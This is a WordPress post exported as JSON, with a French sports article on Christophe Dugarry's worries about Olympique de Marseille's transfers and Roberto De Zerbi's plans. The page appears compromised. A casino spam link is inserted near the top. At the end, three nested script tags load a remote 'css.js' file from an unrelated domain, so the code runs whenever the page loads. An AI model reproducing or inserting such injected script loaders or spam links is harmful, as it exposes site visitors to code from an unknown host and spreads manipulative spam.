{"id":4047,"date":"2025-11-20T04:00:38","date_gmt":"2025-11-20T04:00:38","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4047"},"modified":"2026-02-02T22:09:29","modified_gmt":"2026-02-02T22:09:29","slug":"dugarry-critique-le-mercato-de-lom-ca-me-fait-peur","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/dugarry-critique-le-mercato-de-lom-ca-me-fait-peur\/","title":{"rendered":"Dugarry critique le mercato de l\u2019OM : \u00ab \u00c7a me fait peur ! \u00bb"},"content":{"rendered":"<h1>Dugarry critique le mercato de l\u2019OM : \u00ab \u00c7a me fait peur ! \u00bb<\/h1>\n<p><strong>Christophe Dugarry<\/strong> s\u2019est exprim\u00e9 dans l\u2019\u00e9mission \u00ab Rothen s\u2019enflamme \u00bb au sujet de l\u2019OM et de Roberto De Zerbi. L\u2019ancien international fran\u00e7ais, connu pour sa franchise, a livr\u00e9 une analyse sans concession sur le projet marseillais et les choix actuels du coach italien.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/action-casino-fr.com\/action-casino-app\/\" target=\"_blank\" rel=\"dofollow\">action casino app<\/a><\/strong> &#8211; Vous \u00eates passionn\u00e9 par les jeux de casino en ligne et vous cherchez une solution simple, rapide et s\u00e9curis\u00e9e pour jouer depuis votre mobile ? Et si une<\/p><\/blockquote>\n<h2>Un projet encore fragile<\/h2>\n<p><strong>Dugarry<\/strong> a d\u2019abord rappel\u00e9 l\u2019importance de De Zerbi dans la construction du projet olympien : <em>\u00ab De Zerbi est le centre du projet annonc\u00e9 par Benatia et par le pr\u00e9sident. Le projet est en marche, un projet sur trois ans. La premi\u00e8re ann\u00e9e, l\u2019OM a atteint l\u2019objectif fix\u00e9 : se qualifier pour la Ligue des champions. \u00bb<\/em><\/p>\n<p>Mais pour l\u2019ancien joueur, cette r\u00e9ussite ne suffit pas. <em>\u00ab J\u2019esp\u00e8re que De Zerbi a autre chose dans sa besace. Il nous faut des cojones, d\u2019accord, mais il faut aussi un vrai style de jeu. Pour l\u2019instant, je trouve que c\u2019est tr\u00e8s basique, tr\u00e8s classique. J\u2019attends une touche De Zerbi beaucoup plus marqu\u00e9e. \u00bb<\/em><\/p>\n<h2>Un mercato inqui\u00e9tant<\/h2>\n<p>La principale inqui\u00e9tude de <strong>Dugarry<\/strong> concerne le recrutement estival. <em>\u00ab Il attend aujourd\u2019hui quatre joueurs. Tr\u00e8s bien. Mais excusez-moi, \u00e7a me fait peur. On parlait de Ceballos, de Laporte\u2026 \u00c0 l\u2019arriv\u00e9e, tu prends des jeunes comme CJ Egan-Riley, Hamed Junior Traor\u00e9\u2026 Des bons \u00e9l\u00e9ments, oui, mais est-ce qu\u2019ils ont la carapace pour jouer la Ligue des champions ? \u00bb<\/em><\/p>\n<p>L\u2019ancien attaquant regrette que l\u2019OM n\u2019ait pas choisi la continuit\u00e9 : <em>\u00ab Pour moi, avec l\u2019effectif de la saison derni\u00e8re, ils avaient ce qu\u2019il fallait. Tu gardais les titulaires, les mecs de la rotation comme Rongier, Bennacer, Merlin, et tu rajoutais un avant-centre et trois d\u00e9fenseurs. L\u2019\u00e9quipe \u00e9tait solide. L\u00e0, \u00e7a part un peu dans tous les sens. \u00bb<\/em><\/p>\n<h2>Un effectif affaibli<\/h2>\n<p><strong>Dugarry<\/strong> a insist\u00e9 sur les d\u00e9parts qui, selon lui, affaiblissent l\u2019OM : <em>\u00ab Tu perds Rabiot, tu perds Rongier, tu perds Rowe, tu perds Quentin Merlin. Trois sur quatre sont des joueurs confirm\u00e9s de Ligue 1. Aujourd\u2019hui, l\u2019OM est moins fort qu\u2019en fin de saison derni\u00e8re. \u00bb<\/em><\/p>\n<p>Il s\u2019interroge aussi sur l\u2019int\u00e9gration forc\u00e9e de recrues destin\u00e9es \u00e0 la rotation : <em>\u00ab Ni Murillo, ni Garcia, ni Cornelius ne devaient \u00eatre titulaires. Et l\u00e0, ils se retrouvent propuls\u00e9s dans une d\u00e9fense qui prend l\u2019eau. Est-ce qu\u2019on est s\u00fbr qu\u2019ils ont le niveau Ligue des champions ? M\u00eame pas s\u00fbr qu\u2019ils aient le niveau pour jouer les trois premi\u00e8res places en championnat. \u00bb<\/em><\/p>\n<h2>De Zerbi face \u00e0 ses responsabilit\u00e9s<\/h2>\n<p>Malgr\u00e9 son inqui\u00e9tude, <strong>Dugarry<\/strong> ne ferme pas la porte \u00e0 une r\u00e9ussite de l\u2019entra\u00eeneur italien : <em>\u00ab J\u2019esp\u00e8re que De Zerbi va trouver la bonne formule, quelque chose de magique. Mais pour l\u2019instant, je suis assez inquiet. \u00bb<\/em><\/p>\n<p>Il nuance n\u00e9anmoins : <em>\u00ab Devant, il y a du monde, il y a de l\u2019effectif. Mais au milieu et derri\u00e8re, je suis d\u00e9sol\u00e9, ils ne se sont pas renforc\u00e9s. Je ne suis pas s\u00fbr que l\u2019OM soit meilleur cette ann\u00e9e. J\u2019esp\u00e8re me tromper. \u00bb<\/em><\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dugarry critique le mercato de l\u2019OM : \u00ab \u00c7a me fait peur ! \u00bb Christophe Dugarry s\u2019est exprim\u00e9 dans l\u2019\u00e9mission \u00ab Rothen s\u2019enflamme \u00bb au sujet de l\u2019OM et de&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4047","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4047"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4047\/revisions"}],"predecessor-version":[{"id":14838,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4047\/revisions\/14838"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}